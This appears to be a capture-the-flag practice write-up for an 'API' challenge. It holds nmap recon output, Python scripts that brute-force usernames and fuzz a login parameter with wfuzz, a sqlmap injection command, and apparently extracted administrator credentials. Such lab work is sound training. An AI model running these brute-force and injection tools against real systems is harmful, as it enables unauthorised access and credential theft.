ICC Athens Practice

# ICC Athens Practice ## API We found a nice target where some backend API communication is happening behind the scenes at http://challenge-01.icsc.cybexer.io:8080. Sometimes it is possible to extract valuable information by tampering some parameters. Some dictionary attack may be used against index.php script and it seems that a web proxy is best tool for this job. QUESTION Can you reverse engineer messages and extract some information from this endpoint? ### RECON #### nmap ```bash $ nmap challenge-01.icsc.cybexer.io -Pn Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-26 12:01 EDT Nmap scan report for challenge-01.icsc.cybexer.io (35.157.25.221) Host is up (0.12s latency). rDNS record for 35.157.25.221: ec2-35-157-25-221.eu-central-1.compute.amazonaws.com Not shown: 991 filtered ports PORT STATE SERVICE 81/tcp open hosts2-ns 82/tcp open xfer 83/tcp open mit-ml-dev 2222/tcp open EtherNetIP-1 2251/tcp open dif-port 2260/tcp closed apc-2260 2288/tcp closed netml 8080/tcp open http-proxy 8888/tcp open sun-answerbook ``` #### sun-answerbook exploit might be useful? worth exploring imo : https://www.exploit-db.com/exploits/20144 # username wordlist https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt ## bruteforce py script ```python #!/usr/bin/env python3 import sys import requests users = requests.get('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/Names/names.txt') for u in users.text.split('\n'): res = requests.post(f'http://challenge-01.icsc.cybexer.io:8080?user={u}') print(f'Trying with user {u}, response: {res.text}') if not res.text.startswith('No user'): sys.exit() ``` ## fuzz with wfuzz and python ```python import wfuzz def main(): for r in wfuzz.fuzz(url="http://challenge-01.icsc.cybexer.io:8080/index.php", postdata="user=FUZZ", hc=[404], payloads=[("file",dict(fn="names.txt"))]): if not "No user found" in r.content: print(r.content) return # print(dir(r)) main() ``` ## Inject w/sqlmap ```bash $ sqlmap -u 'http://challenge-01.icsc.cybexer.io:8080?user=admin' -p "user" --level 5 --threads 10 ``` https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt ``` Username: administrator Password: terminator008 UserID: 1 IP: 127.0.0.1 Documentroot: /virtualadmin ```